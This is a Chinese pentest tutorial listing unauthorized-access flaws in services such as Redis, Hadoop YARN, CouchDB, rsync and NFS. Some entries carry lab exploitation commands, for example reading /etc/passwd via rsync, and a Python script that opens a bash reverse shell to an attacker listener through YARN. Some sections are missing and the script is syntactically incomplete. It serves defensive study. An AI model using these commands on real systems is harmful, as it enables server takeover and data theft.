未授权访问漏洞是一个在企业内部非常常见的问题，未授权访问可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷，导致其他用户可以直接访问，从而引发重要权限可被操作、数据库、网站目录等敏感信息泄露。 演示环境搭建 使用vulhub搭建漏洞演示环境 参考：https://vulhub.org/#/docs/install-docker/ 未授权访问漏洞汇总预览 1 、FTP 未授权访问（21） 2 、LDAP 未授权访问（389） 3 、Rsync 未授权访问（873） 4 、ZooKeeper 未授权访问（2181） 5 、Docker 未授权访问（2375） 6 、Docker Registry未授权（5000） 7 、Kibana 未授权访问（5601） 8 、VNC 未授权访问（5900、5901） 9 、CouchDB 未授权访问（5984）  15 10 、Apache Spark 未授权访问（6066、8081、8082） 11 、Redis 未授权访问（6379） 12 、Weblogic 未授权访问（7001） 13 、HadoopYARN 未授权访问（8088） 14 、JBoss 未授权访问（8080） 15 、Jenkins 未授权访问（8080） 16 、Kubernetes Api Server 未授权（8080、10250） 17 、Active MQ 未授权访问（8161） 18 、Jupyter Notebook 未授权访问（8888） 19 、Elasticsearch 未授权访问（9200、9300） 20 、Zabbix 未授权访问（10051） 21 、Memcached 未授权访问（11211） 22 、RabbitMQ 未授权访问（15672、15692、25672） 23 、MongoDB 未授权访问（27017） 24 、NFS 未授权访问（2049、20048） 25 、Dubbo 未授权访问（28096） 26 、Druid 未授权访问 27 、Solr 未授权访问 28 、SpringBoot Actuator 未授权访问 29 、SwaggerUI未授权访问漏洞 30 、Harbor未授权添加管理员漏洞 31 、Windows ipc共享未授权访问漏洞 32 、宝塔phpmyadmin未授权访问 33 、WordPress未授权访问漏洞 34 、Atlassian Crowd 未授权访问 35 、PHP-FPM Fastcgi未授权访问漏洞 36 、uWSGI未授权访问漏洞 37 、Kong未授权访问漏洞(CVE-2020-11710) 38 、ThinkAdminV6未授权访问漏洞 1.  FTP 未授权访问（21） FTP 弱口令或匿名登录漏洞，一般指使用 FTP 的用户启用了匿名登录功能，或系统口令的长度太短、复杂度不够、仅包含数字、或仅包含字母等，容易被黑客攻击，发生恶意文件上传或更严重的入侵行为。 1、端口扫描 2、直接访问ftp路径：ftp://ip:port/ LDAP中文全称为：轻型目录访问协议（Lightweight Directory Access Protocol），默认使用389， LDAP 底层一般使用 TCP 或 UDP 作为传输协议。目录服务是一个特殊的数据库，是一种以树状结构的目录数据库为基础。未对LDAP的访问进行密码验证，导致未授权访问。 1、端口扫描 2、使用nmap寻找到相关的LDAP服务器，可以使用ldapbrowser工具（下载：https://ldapbrowserwindows.com/）直接连接，获取目录内容。 rsync是Linux/Unix下的一个远程数据同步工具，可通过LAN/WAN快速同步多台主机间的文件和目录，默认运行在873端口。由于配置不当，导致任何人可未授权访问rsync，上传本地文件，下载服务器文件。 1、端口扫描 2、root@kali使用Rsync命令即可进行检测。 rsync rsync://192.168.126.130:873/ rsync rsync://192.168.126.130:873/src 利用rsync下载任意文件 rsync rsync://192.168.126.130:873/src/ [出自: jiwo.org ]
etc/passwd ./ ZooKeeper 是一个分布式的开放源码的分布式应用程序协调服务，ZooKeeper 默认开启在 2181 端口在未进行任何访问控制的情况下攻击者可通过执行 envi 命令获得系统大量的敏感信息包括系统名称Java 环境，任意用户在网络可达的情况下进行为未授权访问并读取数据甚至 kill 服务。 1、端口扫描 2、漏洞复现 执行root@kali:~# echo envi|nc 192.168.131.128 2181 获取服务器环境信息： VNC 是虚拟网络控制台Virtual Network Console的英文缩写。它是一款优秀的远程控制工具软件由美国电话电报公司AT&T的欧洲研究实验室开发。VNC是基于 UNXI 和 Linux 的免费开源软件由 VNC Server 和 VNC Viewer 两部分组成。 VNC 默认端口号为 5900、5901。VNC 未授权访问漏洞如被利用可能造成恶意用户直接控制受控主机危害相当严重。 1、端口扫描 Apache CouchDB 是一个开源数据库，默认会在5984端口开放Restful的API接口，如果使用SSL的话就会监听在6984端口，用于数据库的管理功能。其HTTP Server默认开启时没有进行验证，而且绑定在0.0.0.0，所有用户均可通过API访问导致未授权访问。 在官方配置文档中对HTTP Server的配置有WWW-Authenticate：Set this option to trigger basic-auth popup on unauthorized requests，但是很多用户都没有这么配置，导致漏洞产生。 1、端口扫描 2、未授权访问kali测试命令 curl 192.168.126.130:5984 curl 192.168.126.130:5984/_config 指定CouchDB绑定的IP （需要重启CouchDB才能生效）在 /etc/couchdb/local.ini 文件中找到 “bind_address = 0.0.0.0” ，把 0.0.0.0 修改为 127.0.0.1 ，然后保存。 注：修改后只有本机才能访问CouchDB。 设置访问密码（需要重启CouchDB才能生效）在 /etc/couchdb/local.ini 中找到“[admins]”字段配置密码。 设置WWW-Authenticate，强制认证。 10.    Apache Spark 未授权访问（6066、8081、8082） Apache Spark是一款集群计算系统，其支持用户向管理节点提交应用，并分发给集群执行。如果管理节点未启动访问控制，攻击者可以在集群中执行任意代码。该漏洞的本质是未授权用户可以向Master节点提交一个应用，Master节点会分发给Slave节点执行应用。如果应用中包含恶意代码，会导致任意代码执行，威胁Spark集群整体的安全性。 nmap扫描出如下端口开放，则很有可能存在漏洞 CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链，可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。 1、端口扫描 2、使用vulhub搭建漏洞演示环境 cd vulhub/weblogic/CVE-2020-14882 sudo docker-compose up –d 远程攻击者可以构造特殊的HTTP请求，在未经身份验证的情况下接管 WebLogic Server Console ，并在 WebLogic Server Console 执行任意代码。 下载补丁程序并安装更新； 13.    HadoopYARN 未授权访问（8088） Hadoop是一款由Apache基金会推出的分布式系统框架，它通过著名的MapReduce算法进行分布式处理，Yarn是Hadoop集群的资源管理系统。 此次事件主要因HadoopYARN资源管理系统配置不当，导致可以未经授权进行访问，从而被攻击者恶意利用。攻击者无需认证即可通过RESTAPI部署任务来执行任意指令，最终完全控制服务器。 1、端口扫描 2、使用vulhub搭建漏洞演示环境 1 cd /vulhub/hadoop/unauthorized-yarn 2 docker-compose up -d 3、环境启动后，没有配置身份认证，可以未授权访问到Hadoop YARN ResourceManager WebUI页面。 1 http://192.168.126.130:8088/ 2 http://192.168.126.130:8088/cluster

#!/usr/bin/env python
import requests
target = 'http://192.168.126.130:8088/' # 设置目标主机的ip地址
lhost = '192.168.126.128' # 设置你攻击主机的监听ip地址，并且监听端口为9999
url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
    'application-type': 'YARN',
requests.post(url, json=data)

漏洞简述JBOSS 企业应用平台EAP是 J2EE 应用的中间件平台。默认情况下访问 http://ip:8080/jmx-console，就可以浏览 Jboss 的部署管理的信息不需要输入用户名和密码可以直接部署上传木马有安全隐患。 1、端口扫描 2、直接访问 http://ip:port/，看是否能进入 jmx-console 和 web-console 页面 http://ip:8080/ http://ip:8080/jmx-console/ http://ip:8080/jbossws/ Kubernetes 的服务在正常启动后会开启两个端口：Localhost Port （默认8080）、Secure Port （默认6443）。这两个端口都是提供 Api Server 服务的，一个可以直接通过 Web 访问，另一个可以通过 kubectl 客户端进行调用。如果运维人员没有合理的配置验证和权限，那么攻击者就可以通过这两个接口去获取容器的权限。 1、端口扫描 使用nmap寻找相关的端口和服务，直接访问脆弱的服务 （1）端口：8080 http://10.10.4.89:8080/ ActiveMQ 是一款流行的开源消息服务器。默认情况下，ActiveMQ 服务是没有配置安全参数。恶意人员可以利用默认配置弱点发动远程命令执行攻击，获取服务器权限，从而导致数据泄露。 默认端口：8161 默认密码：admin/admin 针对弱口令，可修改conf/jetty.xml文件，bean id 为securityLoginService下的conf值获取用户properties，修改用户名密码，重启服务即可。 18.    Jupyter Notebook 未授权访问（8888） Jupyter Notebook（此前被称为 IPython notebook）是一个交互式笔记本，支持运行 40 多种编程语言。如果管理员未为Jupyter Notebook配置密码，将导致未授权访问漏洞，游客可在其中创建一个console并执行任意Python代码和命令。 1、使用vulhub搭建漏洞演示环境 cd /vulhub/jupyter/notebook-rce docker-compose up -d 2、端口扫描 3、访问http://your-ip:8888，将看到Jupyter Notebook的Web管理界面，并没有要求填写密码。 选择 new -> terminal 即可创建一个控制台： RabbitMQ是目前非常热门的一款消息中间件，基于AMQP协议的，可以在发布者和使用者之间交换异步消息。消息可以是人类可读的JSON，简单字符串或可以转换为JSON字符串的值列表。 1、端口扫描 2、浏览器访问测试 默认账号密码都是guest http://10.10.4.89:15672 http://10.10.4.89:15692 http://10.10.4.89:25672 造成未授权访问的根本原因就在于启动 Mongodb 的时候未设置 –auth 也很少会有人会给数据库添加上账号密码（默认空口令），使用默认空口令这将导致恶意攻击者无需进行账号认证就可以登陆到数据服务器。 1 、端口扫描 2、kali安装mongodb，然后直接连接到服务。 yum install mongodb mongo --host 10.2.20.34 --port 27017 Network File System(NFS)，是由SUN公司研制的UNIX表示层协议(pressentation layer protocol)，能使使用者访问网络上别处的文件就像在使用自己的计算机一样。服务器在启用nfs服务以后，由于nfs服务未限制对外访问，导致共享目录泄漏。 1、端口扫描 #linux安装nfs客户端 apt install nfs-common #查看nfs服务器上的共享目录 showmount -e 192.168.126.130 #挂载相应共享目录到本地 mount -t nfs 192.168.126.130:/grdata /mnt #卸载目录 umount /mnt 利用iptables限制端口2049和20048端口的访问，禁止外部访问； 设置/etc/exports，对访问进行控制； 25.    Dubbo 未授权访问（28096） Dubbo是阿里巴巴公司开源的一个高性能优秀的 服务框架，使得应用可通过高性能的 RPC 实现服务的输 出和输入功能，可以和 Spring框架无缝集成。dubbo 因配置不当导致未授权访问漏洞。 1 、端口扫描 2、连接进入dubbo 服务，进行操作 telent IP port Druid是阿里巴巴数据库出品的，为监控而生的数据库连接池，并且Druid提供的监控功能，监控SQL的执行时间、监控Web URI的请求、Session监控，首先Druid是不存在什么漏洞的。但当开发者配置不当时就可能造成未授权访问。 直接在网站的url中后加上： 1 /druid/index.html 2 /druid/websession.html 3 /druid/datasource.html 4 /druid/sql.html 5 /druid/spring.html 如果可以无需登录，即可登录到Druid监控界面，则说明该网站存在Druid未授权访问漏洞 Solr是一个高性能，采用Java开发，基于Lucene的全文搜索服务器。solr的管理界面通常包含如下信息：solr的配置信息（包括路径，用户名，系统版本信息），数据库的配置信息（地址，用户名，密码），数据库搜索数据等。solr未授权访问的危害很大，轻则可查询所有数据库信息，重则可读取系统任意文件，甚至getshell。 敏感目录扫描时加上一条 /solr/admin http://xx.xx.com/solr/admin https://xx.xx.com/solr/admin Actuator 是 springboot 提供的用来对应用系统进行自省和监控的功能模块，借助于 Actuator 开发者可以很方便地对应用系统某些监控指标进行查看、统计等。在 Actuator 启用的情况下，如果没有做好相关权限控制，非法用户可通过访问默认的执行器端点（endpoints）来获取应用系统中的监控信息，从而导致信息泄露甚至服务器被接管的事件发生。 1、直接访问相关路径： http://10.2.20.48/actuator/autoconfig http://10.2.20.48 /actuator/env http://10.2.20.48/actuator/dump http://10.2.20.48/actuator/headdump 可下载 Atlassian Crowd是一套基于Web的单点登录系统。该系统为多用户、网络应用程序和目录服务器提供验证、授权等功能。Atlassian Crowd Data Center是Crowd的集群部署版。 Atlassian Crowd和Crowd Data Center在其某些发行版本中错误地启用了pdkinstall开发插件，使其存在安全漏洞。攻击者利用该漏洞可在未授权访问的情况下对Atlassian Crowd和Crowd Data Center安装任意的恶意插件，执行任意代码/命令，从而获得服务器权限。